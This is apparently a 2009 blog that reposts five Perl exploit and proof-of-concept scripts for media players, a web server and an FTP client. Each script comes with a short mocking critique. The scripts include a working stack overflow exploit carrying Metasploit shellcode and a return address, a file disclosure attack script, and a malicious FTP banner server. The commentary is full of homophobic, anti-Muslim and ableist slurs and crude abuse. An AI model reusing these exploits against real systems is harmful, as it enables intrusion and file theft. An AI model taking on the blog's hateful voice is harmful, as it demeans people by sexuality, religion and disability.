Thursday, May 14, 2009

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

Main criticism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?


#####################################################################################################
# DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
# DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";


Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"

Tuesday, May 12, 2009

CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit

Main criticism: (*DN9ysysy7F&*SSFSKK8990ol;lIO89980`*BANGS HEAD ON KEYBOARD*89&*n7``jnsdfd8u9d89udsf83ffdfd***BREAKS KEYBOARD***


#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
$junk = "\x41" x 26369;
$eip="\x7D\xBC\x01\x10"; # Universal
$nopsled = "\x90" x 10;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
open(zax,">>zAx.pls");
print zax $header.$junk.$eip.$nopsled.$shellcode;
print "[+] Done !! [+]";
close(zax);


You cum guzzling metasploit ripping faggots! You probably don't even know the difference between INTEL and POWERPC chips! I HOPE MICROSHIT ADDS REAL BUFFER OVERFLOW PROTECTION JUST SO I DONT HAVE TO SLIT MY WRISTS EVERYTIME I SEE YOUR LAME TRIAL AND ERROR BULLSHIT EXPLOITS ON MILH0USE!

NO NO NO THAT STILL WONT HELP, THEN YOU'LL JUST NEVER UPGRADE AND PUT DISCLAIMERS ON THE LAME FUCKING EXPLOITS LIKE "hey im musLIM this only workZ ON WINDOWS XP SP3 NOT 4 OR 5 OR 6 OR 7 OR 8 BECAUSE IM TOO FUCKING STUPID AND I RUIN EVERYTHING MY MOTHER FUCKED A GOAT YEAH SHE DID I FUCKED MY BROTHER AND SISTER IM A FUCKHEAD ARG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" Or something of that fucking nature bitchass towelheadZ!!!

Mereo 1.8.0 Arbitrary File Disclosure Exploit

Main criticism: HOLY SHIT MAW NOW IM A HACKER!@#


#!/usr/bin/perl -w
#
# Found By : Cyber-Zone (ABDELKHALEK)
# Paradis_des_fous@hotmail.fr
#
#
# Note : Don't use this for your own R!sk :d
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers

#
# demo version Tested under my MS WINDOWS sp2
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tMereo 1.8.0 Arbitrary File Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 4)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port File\n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini\n";
}
($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print(" ******************************\n");
print(" * Status *\n");
print(" ******************************\n");
print("Loading ........................................\n\n\n");

$temp="/";
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....> |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
if($Disclosure){
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");
print("SEE U $HackerName\n\n\n");
}
else
{
print(" Not Found !!!\n\n");
exit;
}


Y!s ho!y sh!t you lame fuckhead.. I bet your mother fucked a goat and had you, right?

Tuesday, May 5, 2009

Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit

Main critism: This fucking idiot just won't quit. QUIT FAGGOT, YOU SUCK!


#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS
#
# FIGUIG OwnZ !!!
#
# Streaming Audio Player 0.9 (.M3U File) Local Buffer Overflow PoC
#
#Olly Registers
#EAX 00197D20
#ECX 0000020E
#EDX 00126F84
#EBX 00193DAF
#ESP 001270B8
#EBP 7C81391C kernel32.GetFullPathNameA
#ESI 00197D20
#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 509;
open(MYFILE,'>>buffer.m3u');
print MYFILE $Header.$ex;
close(MYFILE);


LEARN TO WRITE A REAL FUCKING EXPLOIT YOU PROOF OF SHIT!

32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC

Main criticism: Do these fuckups circle jerk until one of them comes up with the most idiotic name possible?


#! /usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner.
# By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#41414141 ?? ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
'Proto' => 'tcp',
'Listen' => SOMAXCONN)
or die "Can't create socket ($!)\n";

print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
print "send> data.\n";
print $client $data;
}
die "Can't accept socket ($!)\n";


And the weiner is... Load 99%, who posted a lame EIP FUCKING OVERWRITE PROOF OF CONCEPT exploit for some no-name loser ftp client. What, the, fuck.